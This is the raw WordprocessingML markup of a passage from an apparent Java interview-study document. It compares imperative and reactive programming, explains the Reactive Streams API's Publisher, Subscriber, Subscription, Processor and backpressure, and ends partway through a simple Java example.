    <w:p w14:paraId="08B3248C"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9A6D49">
          <v:rect id="_x0000_i2272" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DD12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232"/>
        <w:gridCol w:w="3469"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="0E6723F9" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A9E554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eature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="573B86B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Imperative Programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21AD3F6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Reactive Programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="6FEA48A1" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25DBC61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Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4B81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ep-by-step, synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA9673D"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synchronous, event-driven</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="1C146C13" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09F12E8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currency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04934D4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locking, sequential execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2207B0C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Non-blocking, asynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="73748538" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682E2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tate Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7644B54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rect manipulation, mutable state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EA817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eams and immutable state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="726C80BC" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5827A5E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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0413C8B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ceptions, synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0607C0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rrors handled reactively in streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="36959945" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4793A64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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065EE6E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ple, sequential tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01CD28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igh concurrency, real-time data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF46DF" w:rsidRPr="00BF46DF" w14:paraId="73A4BFB8" w14:textId="77777777" w:rsidTr="005164BC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2425CF9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Libraries/Frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59990D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reading, CompletableFuture, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9F0C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RxJava, Project Reactor, Akka Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="125BEDF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5F5606">
          <v:rect id="_x0000_i2273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC48A12"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6DF1CB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o do things, and is ideal for simple, step-by-step processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702AFD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to do things, and is designed for systems that need to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent, event-driven tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently, like real-time data streams, web services, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E36A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ch paradigm has its place, and you should choose one depending on the problem you are solving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8C51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74" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE7346" w14:textId="280184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9" w:name="_Toc197867723"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you explain the reactive stream specification (Reactive Streams API)</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p w14:paraId="11E0AB7A" w14:textId="44ED21E9" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822"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Specification</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as 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API is a key part of the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model, especially when dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming data</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It provides a standard for asynchronous data streams and helps systems to handle large amounts of data efficiently and without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAFD1A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AC31F0">
          <v:rect id="_x0000_i2275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A6FB2"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Key Components of the Reactive Streams API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726BE7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specification defines a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>four core interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are essential for working with asynchronous data streams. These interfaces are designed to facilitate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allowing consumers of a data stream to signal when they are able to process more data. This ensures that a system does not become overwhelmed by an excess of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A902F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4511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is the source of the data. It represents a stream that can publish data items to one or more subscribers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807CD7F"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s responsible for emitting elements to the subscribers when they are ready to receive them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6381C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ublisher can be thought of as a data source, producing a series of items over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76F79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follows a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push-based model</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it pushes data to subscribers when they signal readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104B06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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0056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is the consumer of the data. It is responsible for handling the data emitted by a Publisher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C442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processes each item emitted by the Publisher and can signal back to the Publisher if it can process more items (backpressure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EFF5C"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Subscriber defines methods for receiving data (onNext), handling errors (onError), and acknowledging completion (onComplete).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB71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ption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6703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represents the relationship between a Publisher and a Subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C93E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the Subscriber to request data and signal backpressure to the Publisher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3803B4AE"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provides methods like request(long n) to specify how many elements the Subscriber wants to receive and cancel() to stop receiving data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013738E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rocessor&lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F9B0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Processor is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> type of Subscriber and Publisher. It acts as an intermediary that can both process and forward data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B984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It allows the transformation of data from one form to another and can be used to process a stream while still being able to emit results to other subscribers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E230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rocessor can transform, filter, or manipulate data as it passes through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA29CB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04993B">
          <v:rect id="_x0000_i2276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862AB7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low of Data in Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57BFE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creates a stream of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68EC90"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generates data asynchronously and sends it to any Subscriber that subscribes to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D48114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subscribes to the Publisher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB96C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expresses interest in the data produced by the Publisher by calling Publisher.subscribe(Subscriber).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D641CC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requests data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1830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pon subscribing, the Subscriber can request a specific number of items from the Publisher using the request(long n) method. This is how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is implemented, allowing the Subscriber to request data when it is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD1B0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emits data to Subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102DA2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emits data items as the Subscriber requests them. It calls Subscriber.onNext(T item) for each emitted item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578A2C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letion or Error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50096936"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Once the Publisher finishes emitting data, it signals completion via the onComplete() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141609F2"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n error occurs, the Publisher calls the onError(Throwable throwable) method on the Subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C884DC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74C7E">
          <v:rect id="_x0000_i2277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C7C0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Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDC2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chieved through the request(long n) method in the Subscription interface. The Subscriber can use this method to request only a specific number of items, thus controlling the flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D05F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079EFE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 Subscriber is processing data too slowly, it can request fewer items at a time to prevent being overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F451F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the Subscriber is capable of processing data quickly, it can request more items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FA7383"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BE525D">
          <v:rect id="_x0000_i2278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E3431"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of Reactive Streams in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95203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s an example of how you can use the Reactive Streams API in Java with Publisher, Subscriber, and Subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D01540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mport org.reactivestreams.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700F14D" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A35D44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Publisher implements Publisher&lt;Integer&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CFE8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 = {1, 2, 3, 4, 5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C97D8" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503A126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EE110E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subscribe(Subscriber&lt;? super Integer&gt; subscriber) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53123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Subscribe(new MySubscription(subscriber, data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE9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2758C2C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334B644" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6841191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ption implements Subscription {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D08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Subscriber&lt;? super Integer&gt; subscriber;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F7CB8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E48148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int index = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E490729" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A4BAF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ySubscription(Subscriber&lt;? super Integer&gt; subscriber, int[] data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A54E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subscriber = subscriber;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE3FA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data = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCCA17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045C1E9E" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0F3D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BA611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request(long n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B484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for (long i = 0; i &lt; n &amp;&amp; index &lt; data.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881C4D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Next(data[index++]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568F9D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3744A9F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if (index == data.length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6039E0F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Complete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27785B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F54085E"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5D1E519" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404EDFF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F24E6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cancel() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5EF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 Cancel subscription logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FA8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41C72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26F0B10" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49080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ber implements Subscriber&lt;Integer&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD930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1EFF1A9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Subscribe(Subscription subscription) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BACB80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ption.request(2); // Request 2 items at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D9B5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6DD69E4" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3734317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685A495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Next(Integer item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC87C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Received: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1390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2E59EAD" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E054A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C0B1A2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Error(Throwable t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F75D4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err.println("Error: " + t.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC14F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3F1750E9" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C87DA8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02D8403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Complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D256F7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Data stream completed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603182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6615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E88AFB9" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCA28A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eactiveStreamsExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1287078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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137C27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Publisher publisher = new MyPublisher();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C50E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Subscriber subscriber = new MySubscriber();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4629A469" w14:textId="77777777" w:rsidR="00D33822" w:rsidRPr="00BF46DF" w:rsidRDefault="00D33822" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
